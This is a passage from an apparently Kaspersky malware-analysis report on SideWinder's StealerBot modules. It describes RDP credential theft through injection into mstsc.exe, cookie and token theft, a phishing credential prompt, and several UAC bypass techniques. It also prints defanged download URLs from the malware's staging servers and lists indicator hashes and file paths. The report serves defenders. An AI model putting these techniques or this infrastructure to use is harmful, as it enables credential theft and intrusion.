like to add a few words on the command with ID “1”, which is used to infect other users on the same system whose profile is still “clean”. The malware infects the user by creating a copy of the samples in the target user’s directory and creates a new registry value to ensure persistence.</p> <p>This command is interesting because in the case of a specific error, the bot replies with the following message:</p> <div id="crayon-67446d0bc5e40903193986" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Infected User is already logged in, use install dynx command from stealer bot for installation</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e40903193986-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e40903193986-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e40903193986-1"><span class="crayon-e">Infected </span><span class="crayon-e">User </span><span class="crayon-st">is</span><span class="crayon-h"> </span><span class="crayon-e">already </span><span class="crayon-e">logged </span><span class="crayon-st">in</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-st">use</span><span class="crayon-h"> </span><span class="crayon-e">install </span><span class="crayon-e">dynx </span><span class="crayon-e">command </span><span class="crayon-e">from </span><span class="crayon-e">stealer </span><span class="crayon-e">bot </span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e40903193986-2"><span class="crayon-st">for</span><span class="crayon-h"> </span><span class="crayon-i">installation</span></div></div></td> </tr> </table> </div> </div><p> Currently, we don’t know what the dynx command represents, but the name “stealer bot” in this message and the name of the resource embedded in the “ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the attacker named this malware StealerBot.</p> <h4 id="rdp-credential-stealer">RDP Credential Stealer</h4> <p>This module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes and injects malicious code into “mstsc.exe” to steal RDP credentials.</p> <div id="attachment_114138" style="width: 426px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114138" class="size-full wp-image-114138" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12.png" alt="mstsc.exe GUI" width="416" height="263" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12.png 416w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12-300x190.png 300w" sizes="(max-width: 416px) 100vw, 416px" /></a><p id="caption-attachment-114138" class="wp-caption-text">mstsc.exe GUI</p></div> <p>Mstsc.exe is the “Microsoft Terminal Service Client” process, which is the default RDP client on Windows. The malware monitors the creation or termination of processes with the name “mstsc.exe”. When a new creation event is detected the malware creates a new pipe with the static name “c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into the new process memory.</p> <p>The injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at runtime according to the system architecture, and merged before injection. The injected code is a shellcode that loads another malicious library called “mscorlib”, written in C++ to steal RDP credentials by hooking specific functions of the Windows library “SspiCli.dll”. The library code appears to be based on open-source projects available on GitHub. It uses the Microsoft Detours Package to add or remove the hooks to the following functions:</p> <ul> <li>SspiPrepareForCredRead;</li> <li>CryptProtectMemory;</li> <li>CredIsMarshaledCredentialW.</li> </ul> <p>The three functions are hooked to obtain the server name, password, and username, respectively. The stolen data are sent to the main module using the previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114139" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13.png" alt="" width="918" height="370" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-300x121.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-768x310.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-868x350.png 868w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-740x298.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-695x280.png 695w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-800x322.png 800w" sizes="(max-width: 918px) 100vw, 918px" /></a></p> <h4 id="token-grabber">Token Grabber</h4> <p>The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading additional legitimate and signed libraries whose functions it uses. These libraries are not present on the compromised system by default, so the malware has to drop and load them to function properly.</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Library</strong></td> <td width="45%"><strong>Hash</strong></td> <td width="30%"><strong>Description</strong></td> </tr> <tr> <td>Newtonsoft.Json</td> <td>52a7a3100310400e4655fb6cf204f024</td> <td>A popular high-performance JSON framework for .NET</td> </tr> <tr> <td>System.Data.SQLite</td> <td>fcb2bc2caf7456cd9c2ffab633c1aa0b</td> <td>An ADO.NET provider for SQLite</td> </tr> <tr> <td>SQLite_Interop_x64.dll</td> <td>1b0114d4720af20f225e2fbd653cd296</td> <td>A library for 64-bit architectures required by System.Data.SQLite to work properly</td> </tr> <tr> <td>SQLite_Interop_x86.dll</td> <td>f72f57aa894f7efbef7574a9e853406d</td> <td>A library for 32-bit architectures required by System.Data.SQLite to work properly</td> </tr> </tbody> </table> <h4 id="credential-phisher">Credential Phisher</h4> <p>This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.</p> <div id="attachment_114140" style="width: 471px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114140" class="size-full wp-image-114140" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14.png" alt="Phishing prompt" width="461" height="305" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14.png 461w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14-300x198.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14-423x280.png 423w" sizes="(max-width: 461px) 100vw, 461px" /></a><p id="caption-attachment-114140" class="wp-caption-text">Phishing prompt</p></div> <p>Similar to the RDP Credential Stealer, the malware creates a new pipe (“a21hg56ue2c2365cba1g9840256ad31c”) and injects malicious shellcode into a targeted process, in this case “explorer.exe”. The shellcode loads a malicious library called “credsphisher.dll”, which uses the Windows function “CredUIPromptForWindowsCredentialsW” to display a phishing prompt to current users and trick victims into entering their Windows credentials.</p> <p>When the user enters the credentials, the malware uses the “LogonUserW” function to check that the username and password provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it receives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname, username and password to a previously created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.</p> <h4 id="uacbypass">UACBypass</h4> <p>This module is a .NET library designed to bypass UAC and run malicious code with high privileges.</p> <p>The library can achieve its goal using different bypass techniques, selected according to the Windows version and the security solution installed on the infected machine. The malware embeds various resources containing different payloads used during malware execution.</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Library</strong></td> <td width="45%"><strong>Hash</strong></td> <td width="30%"><strong>Description</strong></td> </tr> <tr> <td>COMUacBypass</td> <td>7f357621ba88a2a52b8146492364b6e0</td> <td>Library used to bypass UAC abusing IElevatedFactoryServer COM object</td> </tr> <tr> <td>manifest</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest</td> </tr> <tr> <td>Module</td> <td>b0f0c29f4143605d5f958eba664cc295</td> <td>Malicious library used to download additional malware</td> </tr> <tr> <td>ReflectiveDllLoader</td> <td>f492b2d5431985078b85c78661e20c09</td> <td>Shellcode to run libraries in memory</td> </tr> <tr> <td>VmComputeAgent</td> <td>ba2914b59c7ae08c346fc5a984dcc219</td> <td>Program used for Slui UAC bypass technique</td> </tr> <tr> <td>VmComputeAgent_exe</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest</td> </tr> </tbody> </table> <p>Before starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn’t require admin credentials and that the infected user belongs to the ‘Administrator’ group. If both conditions are met, the malware checks the Windows version and drops some artifacts according to the obtained values.</p> <table width="100%"> <tbody> <tr> <td colspan="2"><strong>Windows Server or Windows NT 6</strong></td> </tr> <tr> <td width="50%">%Temp%\%TempFile%</td> <td width="50%">Copy of resource named “Module”</td> </tr> <tr> <td>%localappdata%\Microsoft\rundll32.exe</td> <td>Copy of the legitimate program “%systemroot%\System32\rundll32.exe”</td> </tr> <tr> <td>%localappdata%\Microsoft\rundll32.exe.config</td> <td>Copy of resource named “manifest”</td> </tr> <tr> <td colspan="2"><strong>Other Windows versions</strong></td> </tr> <tr> <td>%localappdata%\Microsoft\devobj.dll</td> <td>Copy of resource named “Module”</td> </tr> <tr> <td>%localappdata%\Microsoft\rdpclip.exe</td> <td>Copy of the legitimate program “%systemroot%\System32\rdpclip.exe”</td> </tr> </tbody> </table> <p>The main goal of this component is to execute the resource named “Module”, which is a downloader, with high privileges. The malware tries to use different UAC bypass techniques, which are selected according to the installed security solution. By default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program is abused with <a href="https://oddvar.moe/2017/08/15/research-on-cmstp-exe/" target="_blank" rel="noopener">a technique</a> discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands with high privilege. The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total Security.</p> <p>If these security solutions are detected, the malware attempts to use <a href="https://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html" target="_blank" rel="noopener">a more recent UAC bypass technique</a> discovered in 2022, which abuses the “IElevatedFactoryServer” COM object.</p> <p>In this case, the malware injects malicious shellcode into “explorer.exe”. The shellcode loads and executes a malicious library that was stored in the resource named “COMUacBypass”. The library uses the “IElevatedFactoryServer” COM object to register a new Windows task with the highest privileges, allowing the attacker to execute the command to run the dropped payload with elevated privileges.</p> <p>During the static analysis of the “UACBypass” module we noticed the presence of code that is not called or executed. Specifically, we noticed a method named “KasperskyUACBypass” that implements another bypass technique that was probably used in the past when the system was protected by Kaspersky anti-malware software. The method implements a bypass technique that abuses the legitimate Windows program slui.exe. It is used to activate and register the operating system with a valid product key, but is prone to a file handler hijacking weakness. The hijacking technique <a href="https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b" target="_blank" rel="noopener">was described</a> in 2020 and is based on the modification of specific Windows registry keys. Based on the created values, we believe the attacker based their code on a proof of concept available on GitHub.</p> <p>The module still includes two resources that are used exclusively by this code:</p> <div id="crayon-67446d0bc5e43560420898" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> VmComputeAgent VmComputeAgent_exe</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e43560420898-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e43560420898-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e43560420898-1"><span class="crayon-e">VmComputeAgent</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e43560420898-2"><span class="crayon-i">VmComputeAgent_exe</span></div></div></td> </tr> </table> </div> </div><p> The first is a very simple program, packed with ConfuserEx, which starts a new process: “%systemroot%\System32\slui.exe” as administrator.</p> <p>The second is an XML manifest.</p> <h4 id="downloader">Downloader</h4> <p>The library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs.</p> <div id="crayon-67446d0bc5e45257450968" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64 hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64 hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e45257450968-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e45257450968-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e45257450968-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e45257450968-1"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e45257450968-2"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64</span></div><div class="crayon-line" id="crayon-67446d0bc5e45257450968-3"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr</span></div></div></td> </tr> </table> </div> </div><p> Unfortunately, we were not able to get a valid response from the server, but considering the “name” variable inside the URL and the logic of the various components observed during the investigation, we can infer that each “name” value probably also indicates the real purpose of the file.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>?name=inpl64</td> <td>implant for 64-bit architectures</td> </tr> <tr> <td>?name=stg64</td> <td>stager for 64-bit architectures</td> </tr> <tr> <td>?name=rlfr</td> <td>reflective loader ???</td> </tr> </tbody> </table> <p>The downloaded data are combined into a final payload with the following structure:</p> <div id="crayon-67446d0bc5e48979555869" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> stg64 + <size of rlfr+inpl64+8> + rlfr + <delimiter> + inpl64</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e48979555869-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e48979555869-1"><span class="crayon-i">stg64</span><span class="crayon-h"> </span>+<span class="crayon-h"> </span><span class="crayon-h"><</span><span class="crayon-e">size </span><span class="crayon-e">of </span><span class="crayon-i">rlfr</span>+<span class="crayon-i">inpl64</span>+<span class="crayon-cn">8</span><span class="crayon-h">></span><span class="crayon-h"> </span>+<span class="crayon-h"> </span><span class="crayon-i">rlfr</span><span class="crayon-h"> </span>+<span class="crayon-h"> </span><span class="crayon-h"><</span><span class="crayon-i">delimiter</span><span class="crayon-h">></span><span class="crayon-h"> </span>+<span class="crayon-h"> </span><span class="crayon-i">inpl64</span></div></div></td> </tr> </table> </div> </div><p> Finally, the malware loads the payload into memory and executes it. The execution method is selected according to the version of Windows.</p> <p>On systems prior to Windows 10, the malware allocates a memory region with read, write and execution permissions, copies the previously generated payload to the new region, and directly calls the first address.</p> <p>On newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the “.data” section to the final payload.</p> <p>The malware then patches the kernel32 image in memory and hooks the “LoadLibraryA” function to redirect the execution flow to the small shellcode copied in the allocated region.</p> <p>Finally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.</p> <div id="attachment_114141" style="width: 718px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114141" class="size-full wp-image-114141" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15.png" alt="Snippet of reversed code used to hook LoadLibrary and run the payload " width="708" height="113" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15.png 708w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15-300x48.png 300w" sizes="(max-width: 708px) 100vw, 708px" /></a><p id="caption-attachment-114141" class="wp-caption-text">Snippet of reversed code used to hook LoadLibrary and run the payload</p></div> <p>The small shellcode compares the first 8 bytes of the received argument with the static string “aepic.dl”, and if the bytes match, it jumps to the downloaded shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.</p> <div id="attachment_114142" style="width: 663px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114142" class="size-full wp-image-114142" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16.png" alt="Shellcode embedded in the downloader image" width="653" height="161" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16.png 653w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16-300x74.png 300w" sizes="(max-width: 653px) 100vw, 653px" /></a><p id="caption-attachment-114142" class="wp-caption-text">Shellcode embedded in the downloader image</p></div> <h5 id="installers">Installers</h5> <p>During the investigation we found two more components, which are installers used to deploy the StealerBot on the systems. We didn’t observe them during the infection chain. They are probably used to install new versions of the malware or deploy the malware in different contexts on the same machine. For example, to infect another user.</p> <h6 id="installerpayload">InstallerPayload</h6> <p>The first component is a library developed in C++ that acts as a loader. The code is very similar to the “Downloader” component observed in the UAC bypass module. The library contains different payloads that are joined together at runtime and injected into the remote “spoolsv.exe” process.</p> <p>The injected payload reflectively loads a library called “InstallerPayload.dll”, written in C++, to download additional components and maintain their persistence by creating a new Windows service.</p> <p>The malware is configured to download the files from a predefined URL using WinHTTP.</p> <div id="crayon-67446d0bc5e4a225850676" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E F0mo673/1/1706084656128/x3l8o/2c821e</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e4a225850676-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e4a225850676-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e4a225850676-1"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e4a225850676-2"><span class="crayon-i">F0mo673</span>/<span class="crayon-cn">1</span>/<span class="crayon-cn">1706084656128</span>/<span class="crayon-i">x3l8o</span>/<span class="crayon-cn">2c821e</span></div></div></td> </tr> </table> </div> </div><p> The specific file to be downloaded is requested with a variable “name”, which is included in all GET requests. Each file is downloaded to a specific location:</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable</strong></td> <td width="70%"><strong>Destination file path</strong></td> </tr> <tr> <td>?name=bp</td> <td>%systemroot%\srclinks\%RANDOM_NAME%<br /> Example name: VacPWtys</td> </tr> <tr> <td>?name=ps</td> <td>%systemroot%\srclinks\write.exe<br /> or<br /> %systemroot%\srclinks\fsquirt.exe</td> </tr> <tr> <td>?name=dj</td> <td>%systemroot%\srclinks\devobj.dll<br /> or<br /> %systemroot%\srclinks\propsys.dll</td> </tr> <tr> <td>?name=v3d</td> <td>%systemroot%\srclinks\vm3dservice.exe</td> </tr> <tr> <td>?name=svh</td> <td>%systemroot%\srclinks\winmm.dll</td> </tr> <tr> <td>?name=fsq</td> <td>%systemroot%\srclinks\write.exe<br /> or<br /> %systemroot%\srclinks\fsquirt.exe</td> </tr> </tbody> </table> <p>The specific filename changes according to the Windows version.</p> <p>If the Windows build is lower than 10240 (Windows 10 build 10240), the malware installs the following files:</p> <ul> <li>%systemroot%\srclinks\write.exe</li> <li>%systemroot%\srclinks\propsys.dll</li> <li>%systemroot%\srclinks\write.exe.config</li> <li>%systemroot%\srclinks\vm3dservice.exe</li> <li>%systemroot%\srclinks\winmm.dll</li> </ul> <p>Otherwise:</p> <ul> <li>%systemroot%\srclinks\fsquirt.exe</li> <li>%systemroot%\srclinks\devobj.dll</li> <li>%systemroot%\srclinks\fsquirt.exe.config</li> <li>%systemroot%\srclinks\vm3dservice.exe</li> <li>%systemroot%\srclinks\winmm.dll</li> </ul> <p>The malware also creates a new Windows service named <span id="crayon-67446d0bc5e4c873662437" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"srclink"</span></span></span> to ensure that the downloaded files can start automatically when the system restarts.</p> <p>The service is configured to start automatically and run the following program:</p> <div id="crayon-67446d0bc5e4f382077549" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" 